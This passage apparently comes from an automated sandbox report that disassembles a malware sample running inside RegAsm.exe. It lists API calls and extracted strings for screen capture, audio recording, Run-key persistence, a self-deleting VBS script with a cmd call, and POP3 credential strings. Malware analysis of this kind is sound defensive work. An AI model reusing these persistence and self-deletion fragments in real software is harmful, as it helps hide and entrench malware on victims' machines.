                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$_free$InfoLocale_abort
                            • String ID:
                            • API String ID: 1663032902-0
                            • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                            • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                            • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                            • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                            APIs
                              • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$InfoLocale_abort_free
                            • String ID:
                            • API String ID: 2692324296-0
                            • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                            • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                            • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                            • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                            APIs
                              • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                            • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalEnterEnumLocalesSectionSystem
                            • String ID:
                            • API String ID: 1272433827-0
                            • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                            • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                            • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                            • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                            APIs
                              • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                            • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                            • String ID:
                            • API String ID: 1084509184-0
                            • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                            • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                            • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                            • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                            APIs
                            • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.1 Pro), ref: 0040F920
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID:
                            • API String ID: 2299586839-0
                            • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                            • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                            • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                            • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                            APIs
                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                            • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                              • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                            • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                            • DeleteDC.GDI32(00000000), ref: 00418F65
                            • DeleteDC.GDI32(00000000), ref: 00418F68
                            • DeleteObject.GDI32(00000000), ref: 00418F6B
                            • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                            • DeleteDC.GDI32(00000000), ref: 00418F9D
                            • DeleteDC.GDI32(00000000), ref: 00418FA0
                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                            • GetCursorInfo.USER32(?), ref: 00418FE2
                            • GetIconInfo.USER32 ref: 00418FF8
                            • DeleteObject.GDI32(?), ref: 00419027
                            • DeleteObject.GDI32(?), ref: 00419034
                            • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                            • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                            • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                            • DeleteDC.GDI32(?), ref: 004191B7
                            • DeleteDC.GDI32(00000000), ref: 004191BA
                            • DeleteObject.GDI32(00000000), ref: 004191BD
                            • GlobalFree.KERNEL32(?), ref: 004191C8
                            • DeleteObject.GDI32(00000000), ref: 0041927C
                            • GlobalFree.KERNEL32(?), ref: 00419283
                            • DeleteDC.GDI32(?), ref: 00419293
                            • DeleteDC.GDI32(00000000), ref: 0041929E
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                            • String ID: DISPLAY
                            • API String ID: 4256916514-865373369
                            • Opcode ID: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                            • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                            • Opcode Fuzzy Hash: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                            • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                            APIs
                              • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                              • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                              • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,`.S,004752F0,?,pth_unenc), ref: 0040B8F6
                              • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                              • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                              • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                            • ExitProcess.KERNEL32 ref: 0040D80B
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                            • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                            • API String ID: 1861856835-1447701601
                            • Opcode ID: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                            • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                            • Opcode Fuzzy Hash: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                            • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                            APIs
                              • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                              • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                              • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,`.S,004752F0,?,pth_unenc), ref: 0040B8F6
                              • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                              • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                              • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,638E1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                            • ExitProcess.KERNEL32 ref: 0040D454
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                            • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`.S$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                            • API String ID: 3797177996-2806175522
                            • Opcode ID: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                            • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                            • Opcode Fuzzy Hash: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                            • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                            APIs
                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                            • ExitProcess.KERNEL32(00000000), ref: 004124DB
                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                            • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                            • CloseHandle.KERNEL32(00000000), ref: 00412576
                            • GetCurrentProcessId.KERNEL32 ref: 0041257C
                            • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                            • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                            • lstrcatW.KERNEL32 ref: 0041263C
                              • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                            • Sleep.KERNEL32(000001F4), ref: 004126BD
                            • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                            • CloseHandle.KERNEL32(00000000), ref: 004126E4
                            • GetCurrentProcessId.KERNEL32 ref: 004126EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                            • String ID: .exe$8SG$WDH$exepath$open$temp_
                            • API String ID: 2649220323-436679193
                            • Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                            • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                            • Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                            • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                            APIs
                            • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                            • SetEvent.KERNEL32 ref: 0041B2AA
                            • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                            • CloseHandle.KERNEL32 ref: 0041B2CB
                            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                            • API String ID: 738084811-2094122233
                            • Opcode ID: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                            • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                            • Opcode Fuzzy Hash: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                            • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                            APIs
                            • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                            • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                            • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                            • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                            • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                            • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                            • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                            • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                            • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                            • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Write$Create
                            • String ID: RIFF$WAVE$data$fmt
                            • API String ID: 1602526932-4212202414
                            • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                            • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                            • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                            • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                            APIs
                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,`.S,00407709), ref: 004072BF
                            • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                            • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                            • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                            • GetProcAddress.KERNEL32(00000000), ref: 00407308
                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                            • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                            • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                            • GetProcAddress.KERNEL32(00000000), ref: 00407330
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                            • API String ID: 1646373207-255920310
                            • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                            • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                            • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                            • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$EnvironmentVariable
                            • String ID: X8S
                            • API String ID: 1464849758-2014517935
                            • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                            • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                            • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                            • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                            • API String ID: 4218353326-3023110444
                            • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                            • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                            • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                            • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                            APIs
                            • _wcslen.LIBCMT ref: 0040CE42
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                            • CopyFileW.KERNEL32 ref: 0040CF0B
                            • _wcslen.LIBCMT ref: 0040CF21
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                            • CopyFileW.KERNEL32 ref: 0040CFBF
                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                            • _wcslen.LIBCMT ref: 0040D001
                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                            • CloseHandle.KERNEL32 ref: 0040D068
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                            • ExitProcess.KERNEL32 ref: 0040D09D
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                            • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$`.S$del$open
                            • API String ID: 1579085052-3551569772
                            • Opcode ID: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                            • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                            • Opcode Fuzzy Hash: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                            • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                            APIs
                            • lstrlenW.KERNEL32(?), ref: 0041C0C7
                            • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                            • lstrlenW.KERNEL32(?), ref: 0041C0F8
                            • FindFirstVolumeW.KERNEL32 ref: 0041C133
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                            • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
